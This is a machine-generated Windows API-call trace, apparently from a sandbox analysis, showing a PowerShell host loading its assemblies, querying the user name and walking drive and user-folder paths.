	[0219.048] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x27d1e0 | out: lpFileInformation=0x27d1e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0219.048] SetErrorMode (uMode=0x1) returned 0x1
	[0219.049] GetLogicalDrives () returned 0x4
	[0219.049] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x27cd40, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0219.050] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0219.050] SetErrorMode (uMode=0x1) returned 0x1
	[0219.051] CoTaskMemAlloc (cb=0x68) returned 0x1b793620
	[0219.051] CoTaskMemAlloc (cb=0x68) returned 0x1b793690
	[0219.051] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x1b793620, nVolumeNameSize=0x32, lpVolumeSerialNumber=0x27d1b0, lpMaximumComponentLength=0x27d1ac, lpFileSystemFlags=0x27d1a8, lpFileSystemNameBuffer=0x1b793690, nFileSystemNameSize=0x32 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x27d1b0*=0x705ba84c, lpMaximumComponentLength=0x27d1ac*=0xff, lpFileSystemFlags=0x27d1a8*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1
	[0219.051] CoTaskMemFree (pv=0x1b793620) 
	[0219.051] CoTaskMemFree (pv=0x1b793690) 
	[0219.051] SetErrorMode (uMode=0x1) returned 0x1
	[0219.051] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0219.052] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x27cef0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0219.052] SetErrorMode (uMode=0x1) returned 0x1
	[0219.053] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x27d150 | out: lpFileInformation=0x27d150*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0219.053] SetErrorMode (uMode=0x1) returned 0x1
	[0219.053] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x27cef0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0219.053] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x27cda0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0219.053] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0219.053] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x27ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0219.053] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0219.054] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x27cd20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0219.054] SetErrorMode (uMode=0x1) returned 0x1
	[0219.054] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x27cf80 | out: lpFileInformation=0x27cf80*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0219.054] SetErrorMode (uMode=0x1) returned 0x1
	[0219.054] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x27cd20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0219.054] SetErrorMode (uMode=0x1) returned 0x1
	[0219.054] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x27cf80 | out: lpFileInformation=0x27cf80*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0219.054] SetErrorMode (uMode=0x1) returned 0x1
	[0219.055] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x27cdc0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0219.055] SetErrorMode (uMode=0x1) returned 0x1
	[0219.055] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x27d020 | out: lpFileInformation=0x27d020*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0219.055] SetErrorMode (uMode=0x1) returned 0x1
	[0219.055] CoTaskMemAlloc (cb=0x804) returned 0x56f200
	[0219.055] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x56f200, nSize=0x27d428 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x27d428) returned 0x1
	[0219.055] CoTaskMemFree (pv=0x56f200) 
	[0219.055] CoTaskMemAlloc (cb=0x204) returned 0x4e89c0
	[0219.055] GetUserNameW (in: lpBuffer=0x4e89c0, pcbBuffer=0x27d468 | out: lpBuffer="aETAdzjz", pcbBuffer=0x27d468) returned 1
	[0219.056] CoTaskMemFree (pv=0x4e89c0) 
	[0219.056] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ecfde0*="FileSystem", lpRawData=0x2ecfb70) returned 1
	[0219.068] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0219.068] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0219.068] CoTaskMemFree (pv=0x506ba0) 
	[0219.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.069] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cc50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.070] CoTaskMemAlloc (cb=0x804) returned 0x56f200
	[0219.070] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x56f200, nSize=0x27d428 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x27d428) returned 0x1
	[0219.070] CoTaskMemFree (pv=0x56f200) 
	[0219.070] CoTaskMemAlloc (cb=0x204) returned 0x4e89c0
	[0219.070] GetUserNameW (in: lpBuffer=0x4e89c0, pcbBuffer=0x27d468 | out: lpBuffer="aETAdzjz", pcbBuffer=0x27d468) returned 1
	[0219.070] CoTaskMemFree (pv=0x4e89c0) 
	[0219.071] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ed55d0*="Function", lpRawData=0x2ed5360) returned 1
	[0219.078] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0219.078] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0224.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.477] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0224.479] CoTaskMemAlloc (cb=0x804) returned 0x56f200
	[0224.479] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x56f200, nSize=0x27d428 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x27d428) returned 0x1
	[0224.480] CoTaskMemFree (pv=0x56f200) 
	[0224.480] CoTaskMemAlloc (cb=0x204) returned 0x4e89c0
	[0224.480] GetUserNameW (in: lpBuffer=0x4e89c0, pcbBuffer=0x27d468 | out: lpBuffer="aETAdzjz", pcbBuffer=0x27d468) returned 1
	[0224.480] CoTaskMemFree (pv=0x4e89c0) 
	[0224.480] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f07810*="Registry", lpRawData=0x2f075a0) returned 1
	[0225.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.128] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0225.128] CoTaskMemAlloc (cb=0x804) returned 0x56f200
	[0225.128] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x56f200, nSize=0x27d428 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x27d428) returned 0x1
	[0225.129] CoTaskMemFree (pv=0x56f200) 
	[0225.129] CoTaskMemAlloc (cb=0x204) returned 0x4e89c0
	[0225.129] GetUserNameW (in: lpBuffer=0x4e89c0, pcbBuffer=0x27d468 | out: lpBuffer="aETAdzjz", pcbBuffer=0x27d468) returned 1
	[0225.129] CoTaskMemFree (pv=0x4e89c0) 
	[0225.129] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f0cbd8*="Variable", lpRawData=0x2f0c968) returned 1
	[0225.135] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0225.135] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0225.135] CoTaskMemFree (pv=0x506ba0) 
	[0225.138] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0225.138] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0225.138] CoTaskMemFree (pv=0x506ba0) 
	[0225.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x27ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0225.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x27cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0225.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x27cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0225.141] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x27cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0227.653] CoTaskMemAlloc (cb=0x804) returned 0x56f200
	[0227.653] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x56f200, nSize=0x27d428 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x27d428) returned 0x1
	[0227.654] CoTaskMemFree (pv=0x56f200) 
	[0227.654] CoTaskMemAlloc (cb=0x204) returned 0x4e89c0
	[0227.654] GetUserNameW (in: lpBuffer=0x4e89c0, pcbBuffer=0x27d468 | out: lpBuffer="aETAdzjz", pcbBuffer=0x27d468) returned 1
	[0227.654] CoTaskMemFree (pv=0x4e89c0) 
	[0227.654] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2f207a0*="Certificate", lpRawData=0x2f20530) returned 1
	[0228.226] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0228.226] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.226] CoTaskMemFree (pv=0x506ba0) 
	[0228.230] GetLogicalDrives () returned 0x4
	[0228.230] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x27d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0228.230] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0228.231] CoTaskMemAlloc (cb=0x20e) returned 0x1b794b60
	[0228.231] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b794b60 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents") returned 0x1b
	[0228.231] CoTaskMemFree (pv=0x1b794b60) 
	[0228.232] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0228.232] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.232] CoTaskMemFree (pv=0x506ba0) 
	[0228.232] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0228.232] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.232] CoTaskMemFree (pv=0x506ba0) 
	[0228.249] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0228.249] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.249] CoTaskMemFree (pv=0x506ba0) 
	[0228.255] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0228.255] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.256] CoTaskMemFree (pv=0x506ba0) 
	[0228.257] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x27ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0228.257] SetErrorMode (uMode=0x1) returned 0x1
	[0228.257] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x27d070 | out: lpFileInformation=0x27d070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0228.257] SetErrorMode (uMode=0x1) returned 0x1
	[0228.257] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x27ce10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0228.257] SetErrorMode (uMode=0x1) returned 0x1
	[0228.258] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x27d070 | out: lpFileInformation=0x27d070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0228.258] SetErrorMode (uMode=0x1) returned 0x1
	[0228.259] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0228.259] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0228.259] CoTaskMemFree (pv=0x506ba0) 
	[0228.844] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x27cfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0228.847] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x27ce20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0228.847] SetErrorMode (uMode=0x1) returned 0x1
	[0228.847] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x27d030 | out: lpFileInformation=0x27d030*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0228.847] SetErrorMode (uMode=0x1) returned 0x1
	[0228.847] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x27ce20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0228.847] SetErrorMode (uMode=0x1) returned 0x1
	[0228.847] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x27d030 | out: lpFileInformation=0x27d030*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0x6cd47e0, ftLastAccessTime.dwHighDateTime=0x1d337b1, ftLastWriteTime.dwLowDateTime=0x6cd47e0, ftLastWriteTime.dwHighDateTime=0x1d337b1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0228.848] SetErrorMode (uMode=0x1) returned 0x1
	[0228.848] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x27ce30, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0228.848] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x27cd20, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0228.848] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x27ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0228.848] SetErrorMode (uMode=0x1) returned 0x1
	[0228.848] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x27d030 | out: lpFileInformation=0x27d030*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0228.848] SetErrorMode (uMode=0x1) returned 0x1
	[0228.848] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x27ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0228.848] SetErrorMode (uMode=0x1) returned 0x1
	[0228.848] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x27d030 | out: lpFileInformation=0x27d030*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0228.848] SetErrorMode (uMode=0x1) returned 0x1
	[0228.848] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x27ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0228.849] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x27cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
	[0228.849] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x27ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0228.849] SetErrorMode (uMode=0x1) returned 0x1
	[0228.849] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x27d030 | out: lpFileInformation=0x27d030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0228.849] SetErrorMode (uMode=0x1) returned 0x1
	[0228.849] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x27ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0228.849] SetErrorMode (uMode=0x1) returned 0x1
	[0228.849] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x27d030 | out: lpFileInformation=0x27d030*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0228.849] SetErrorMode (uMode=0x1) returned 0x1
	[0228.849] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x27ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0228.849] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x27cd20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0228.849] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x27ce20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0228.849] SetErrorMode (uMode=0x1) returned 0x1
